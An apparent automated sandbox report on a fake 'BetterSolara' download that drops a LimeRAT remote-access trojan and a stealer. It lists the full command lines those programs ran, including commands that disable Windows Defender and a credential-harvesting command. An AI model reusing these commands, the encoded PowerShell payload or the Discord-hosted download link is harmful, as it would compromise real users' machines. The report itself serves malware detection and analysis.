385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 509167.crdownload:SmartScreen msedge.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

vlc.exe

pid process

696 vlc.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 509167.crdownload:SmartScreen	msedge.exe

pid	process
696	vlc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.execd57e4c271d6e8f5ea8b8f824a6a7316.exepowershell.exepowershell.exepowershell.exeWservices.exemsedge.exe

pid	process
1896	msedge.exe
1896	msedge.exe
4928	msedge.exe
4928	msedge.exe
4328	identity_helper.exe
4328	identity_helper.exe
5592	msedge.exe
5592	msedge.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
5912	powershell.exe
5912	powershell.exe
5912	powershell.exe
5552	powershell.exe
5552	powershell.exe
5552	powershell.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5608	Wservices.exe
5504	msedge.exe
5504	msedge.exe
5504	msedge.exe
5504	msedge.exe
5608	Wservices.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid process

696 vlc.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

4928 msedge.exe
4928 msedge.exe
4928 msedge.exe
4928 msedge.exe
4928 msedge.exe
4928 msedge.exe
4928 msedge.exe

pid	process
696	vlc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Token: SeIncreaseQuotaPrivilege	4456	wmic.exe
Token: SeSecurityPrivilege	4456	wmic.exe
Token: SeTakeOwnershipPrivilege	4456	wmic.exe
Token: SeLoadDriverPrivilege	4456	wmic.exe
Token: SeSystemProfilePrivilege	4456	wmic.exe
Token: SeSystemtimePrivilege	4456	wmic.exe
Token: SeProfSingleProcessPrivilege	4456	wmic.exe
Token: SeIncBasePriorityPrivilege	4456	wmic.exe
Token: SeCreatePagefilePrivilege	4456	wmic.exe
Token: SeBackupPrivilege	4456	wmic.exe
Token: SeRestorePrivilege	4456	wmic.exe
Token: SeShutdownPrivilege	4456	wmic.exe
Token: SeDebugPrivilege	4456	wmic.exe
Token: SeSystemEnvironmentPrivilege	4456	wmic.exe
Token: SeRemoteShutdownPrivilege	4456	wmic.exe
Token: SeUndockPrivilege	4456	wmic.exe
Token: SeManageVolumePrivilege	4456	wmic.exe
Token: 33	4456	wmic.exe
Token: 34	4456	wmic.exe
Token: 35	4456	wmic.exe
Token: 36	4456	wmic.exe
Token: SeIncreaseQuotaPrivilege	4456	wmic.exe
Token: SeSecurityPrivilege	4456	wmic.exe
Token: SeTakeOwnershipPrivilege	4456	wmic.exe
Token: SeLoadDriverPrivilege	4456	wmic.exe
Token: SeSystemProfilePrivilege	4456	wmic.exe
Token: SeSystemtimePrivilege	4456	wmic.exe
Token: SeProfSingleProcessPrivilege	4456	wmic.exe
Token: SeIncBasePriorityPrivilege	4456	wmic.exe
Token: SeCreatePagefilePrivilege	4456	wmic.exe
Token: SeBackupPrivilege	4456	wmic.exe
Token: SeRestorePrivilege	4456	wmic.exe
Token: SeShutdownPrivilege	4456	wmic.exe
Token: SeDebugPrivilege	4456	wmic.exe
Token: SeSystemEnvironmentPrivilege	4456	wmic.exe
Token: SeRemoteShutdownPrivilege	4456	wmic.exe
Token: SeUndockPrivilege	4456	wmic.exe
Token: SeManageVolumePrivilege	4456	wmic.exe
Token: 33	4456	wmic.exe
Token: 34	4456	wmic.exe
Token: 35	4456	wmic.exe
Token: 36	4456	wmic.exe
Token: SeIncreaseQuotaPrivilege	2624	wmic.exe
Token: SeSecurityPrivilege	2624	wmic.exe
Token: SeTakeOwnershipPrivilege	2624	wmic.exe
Token: SeLoadDriverPrivilege	2624	wmic.exe
Token: SeSystemProfilePrivilege	2624	wmic.exe
Token: SeSystemtimePrivilege	2624	wmic.exe
Token: SeProfSingleProcessPrivilege	2624	wmic.exe
Token: SeIncBasePriorityPrivilege	2624	wmic.exe
Token: SeCreatePagefilePrivilege	2624	wmic.exe
Token: SeBackupPrivilege	2624	wmic.exe
Token: SeRestorePrivilege	2624	wmic.exe
Token: SeShutdownPrivilege	2624	wmic.exe
Token: SeDebugPrivilege	2624	wmic.exe
Token: SeSystemEnvironmentPrivilege	2624	wmic.exe
Token: SeRemoteShutdownPrivilege	2624	wmic.exe
Token: SeUndockPrivilege	2624	wmic.exe
Token: SeManageVolumePrivilege	2624	wmic.exe
Token: 33	2624	wmic.exe
Token: 34	2624	wmic.exe
Token: 35	2624	wmic.exe
Token: 36	2624	wmic.exe

Suspicious use of FindShellTrayWindow 43 IoCs

Processes:

msedge.execd57e4c171d6e8f5ea8b8f824a6a7316.exevlc.exe

pid	process
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
696	vlc.exe
696	vlc.exe
696	vlc.exe
696	vlc.exe

Suspicious use of SendNotifyMessage 27 IoCs

Processes:

msedge.exevlc.exe

pid	process
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
696	vlc.exe
696	vlc.exe
696	vlc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

vlc.exe

pid process

696 vlc.exe

pid	process
696	vlc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4928 wrote to memory of 968	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 968	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 3084	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1896	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1896	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe
PID 4928 wrote to memory of 1428	4928	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

3416 attrib.exe
6100 attrib.exe
4940 attrib.exe
1664 attrib.exe

pid	process
3416	attrib.exe
6100	attrib.exe
4940	attrib.exe
1664	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1245482251467362385/1245491763477610506/BetterSolara.exe?ex=6658f218&is=6657a098&hm=6d4a1d7d00451c014a500cb11aa96a187ef87e27e44a2d7e34eb3e57704912ab&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa05d646f8,0x7ffa05d64708,0x7ffa05d64718
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
  2⤵
  PID:3084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
  2⤵
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5460 /prefetch:8
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
  2⤵
  PID:1676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
  2⤵
  PID:4388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5664 /prefetch:8
  2⤵
  PID:692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5592
- C:\Users\Admin\Downloads\BetterSolara.exe
  "C:\Users\Admin\Downloads\BetterSolara.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat" "
    3⤵
    PID:2076
  - - C:\Windows\system32\chcp.com
      chcp.com 437
      4⤵
      PID:5824
  - - C:\Windows\system32\find.exe
      fInd
      4⤵
      PID:5852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      4⤵
      PID:5876
  - - C:\Windows\system32\findstr.exe
      findstr /L /I set "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"
      4⤵
      PID:5776
  - - C:\Windows\system32\findstr.exe
      findstr /L /I goto "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"
      4⤵
      PID:5916
  - - C:\Windows\system32\findstr.exe
      findstr /L /I echo "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"
      4⤵
      PID:5924
  - - C:\Windows\system32\findstr.exe
      findstr /L /I pause "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"
      4⤵
      PID:5972
  - - C:\Windows\system32\find.exe
      fInd
      4⤵
      PID:5928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      4⤵
      PID:5944
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
      cd57e4c171d6e8f5ea8b8f824a6a7316.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of FindShellTrayWindow
      PID:5984
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
      cd57e4c172d6e8f5ea8b8f824a6a7316.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:6012
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\Wservices.exe'"
        5⤵
        Creates scheduled task(s)
        
        PID:5900
    - - C:\Users\Admin\AppData\Roaming\Wservices.exe
        
        "C:\Users\Admin\AppData\Roaming\Wservices.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5608
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
      cd57e4c271d6e8f5ea8b8f824a6a7316.exe
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Maps connected drives based on registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6060
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
        5⤵
        Views/modifies file attributes
        
        PID:6100
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        5⤵
        Views/modifies file attributes
        
        PID:4940
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2016
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        
        PID:5372
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        5⤵
        
        PID:5648
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5912
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5928
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:436
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1664
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:1992
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3416
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEI